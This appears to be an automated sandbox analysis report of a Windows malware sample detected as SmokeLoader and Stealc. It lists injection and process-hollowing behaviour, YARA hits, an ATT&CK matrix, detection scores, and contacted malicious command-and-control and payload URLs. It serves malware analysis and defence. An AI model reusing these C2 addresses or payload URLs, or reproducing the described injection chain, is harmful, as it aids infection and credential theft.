Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_0064A545 push dword ptr fs:[00000030h]	0_2_0064A545
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A092B mov eax, dword ptr fs:[00000030h]	0_2_007A092B
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A0D90 mov eax, dword ptr fs:[00000030h]	0_2_007A0D90
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_0067092B mov eax, dword ptr fs:[00000030h]	4_2_0067092B
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00670D90 mov eax, dword ptr fs:[00000030h]	4_2_00670D90
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_006FA0BD push dword ptr fs:[00000030h]	4_2_006FA0BD

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: birajci.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 84.32.84.152 443			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 2.185.214.11 80			Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 9A25.exe PID: 3500, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Code function: 6_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

6_2_0301A090

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Thread created: C:\Windows\explorer.exe EIP: 86719B0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Thread created: unknown EIP: 2F219B0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\svchost015.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 41E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 42B000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Memory written: C:\Users\user\AppData\Local\Temp\svchost015.exe base: 63E000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

Process created: C:\Users\user\AppData\Local\Temp\svchost015.exe C:\Users\user\AppData\Local\Temp\svchost015.exe

Jump to behavior

Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: explorer.exe, 00000002.00000000.2160436638.00000000048E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3358992116.0000000005190000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3358992116.0000000005190000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000C.00000002.3357740513.0000000005079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Progman[f^
Source: explorer.exe, 0000000C.00000002.3352828466.0000000001017000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1Progman
Source: explorer.exe, 00000002.00000000.2159354736.0000000000D69000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: +Progman
Source: explorer.exe, 00000002.00000000.2159574479.00000000013A0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd31A

Source: C:\Users\user\AppData\Local\Temp\svchost015.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR

Remote Access Functionality

Yara detected CryptOne packer

Source: Yara match

File source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	812 Process Injection	11 Masquerading	OS Credential Dumping	631 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	1 DLL Side-Loading	24 Virtualization/Sandbox Evasion	LSASS Memory	24 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	812 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	12 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 File Deletion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
oZB7n3wuNk.exe	63%	ReversingLabs	Win32.Infostealer.Tinba
oZB7n3wuNk.exe	64%	Virustotal		Browse
oZB7n3wuNk.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\birajci	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9A25.exe	38%	ReversingLabs	Win32.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\svchost015.exe	4%	ReversingLabs
C:\Users\user\AppData\Roaming\birajci	63%	ReversingLabs	Win32.Infostealer.Tinba

Source	Detection	Scanner	Label
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
http://ocsps.ssl.com0	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://www.ssl.com/repository0	0%	URL Reputation	safe
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpF	100%	Avira URL Cloud	malware
https://outlook.com	0%	URL Reputation	safe
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpZ	100%	Avira URL Cloud	malware
https://api.msn.com/I	0%	Avira URL Cloud	safe
https://word.office.comM	0%	Avira URL Cloud	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	0%	Avira URL Cloud	safe
http://crls.ssl.com/ssl.com-rsa-RootCA.crl0	0%	URL Reputation	safe
http://www.x-ways.net/winhex/subscribe-d.htmlU	0%	Avira URL Cloud	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://github.com/tesseract-ocr/tessdata/	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpO	100%	Avira URL Cloud	malware
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
http://www.x-ways.net/order	0%	Avira URL Cloud	safe
http://www.x-ways.net/order.html-d.htmlS	0%	Avira URL Cloud	safe
http://olihonols.in.net/tmp/	0%	Avira URL Cloud	safe
http://91.202.233.158/	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.php	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	Avira URL Cloud	safe
http://91.202.233.158	100%	Avira URL Cloud	malware
http://nicetolosv.xyz/tmp/	0%	Avira URL Cloud	safe
https://www.x-ways.net/winhex/forum/	0%	Avira URL Cloud	safe
http://www.x-ways.net/winhex/license-d-f.htmlS	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.php6	100%	Avira URL Cloud	malware
http://91.202.233.158/e96ea2db21fa9a1b.php4	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	0%	Avira URL Cloud	safe
http://jftolsa.ws/tmp/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	0%	Avira URL Cloud	safe
https://www.x-ways.net/forensics/x-tensions.html	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.phpws	100%	Avira URL Cloud	malware
http://www.x-ways.net/winhex/subscribe	0%	Avira URL Cloud	safe
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	0%	Avira URL Cloud	safe
https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe	0%	Avira URL Cloud	safe
https://www.x-ways.net/forensics/x-tensions.htmlf	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz	0%	Avira URL Cloud	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc	0%	Avira URL Cloud	safe
https://excel.office.com-	0%	Avira URL Cloud	safe
http://91.202.233.158/ws	100%	Avira URL Cloud	malware
https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-	0%	Avira URL Cloud	safe
http://91.202.233.158Gk	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA	0%	Avira URL Cloud	safe
http://epohe.ru/tmp/	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve	0%	Avira URL Cloud	safe
http://91.202.233.158j	0%	Avira URL Cloud	safe
https://outlook.come	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation	0%	Avira URL Cloud	safe
https://powerpoint.office.comEMd	0%	Avira URL Cloud	safe
https://www.msn.com:443/en-us/feed	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	Avira URL Cloud	safe
http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800	100%	Avira URL Cloud	malware
http://www.x-ways.net/winhex/license	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
epohe.ru	2.185.214.11	true	true	unknown
free.cdn.hstgr.net	84.32.84.152	true	true	unknown
www.darkviolet-alpaca-923878.hostingersite.com	unknown	unknown	true	unknown
api.msn.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nicetolosv.xyz/tmp/	true	Avira URL Cloud: safe	unknown
http://olihonols.in.net/tmp/	true	Avira URL Cloud: safe	unknown
http://91.202.233.158/	true	Avira URL Cloud: malware	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php	true	Avira URL Cloud: malware	unknown
http://jftolsa.ws/tmp/	true	Avira URL Cloud: safe	unknown
https://www.darkviolet-alpaca-923878.hostingersite.com/Coin.exe	true	Avira URL Cloud: safe	unknown
http://epohe.ru/tmp/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpF	svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0Q	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	Avira URL Cloud: safe	unknown
https://api.msn.com/I	explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpO	svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://word.office.comM	explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.phpZ	svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://ocsps.ssl.com0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://github.com/tesseract-ocr/tessdata/	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/subscribe-d.htmlU	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 0000000C.00000002.3367028354.000000000B390000.00000004.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2161155359.0000000007B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2161168607.0000000007B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2159653301.00000000028A0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/order	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.x-ways.net/order.html-d.htmlS	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
https://www.ssl.com/repository0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
http://91.202.233.158	svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009FC000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.x-ways.net/winhex/forum/	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/license-d-f.htmlS	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php6	svchost015.exe, 00000007.00000002.2809296945.00000000009F3000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.202.233.158/e96ea2db21fa9a1b.php4	svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu	explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	false	URL Reputation: safe	unknown
https://www.x-ways.net/forensics/x-tensions.html	9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	false	Avira URL Cloud: safe	unknown
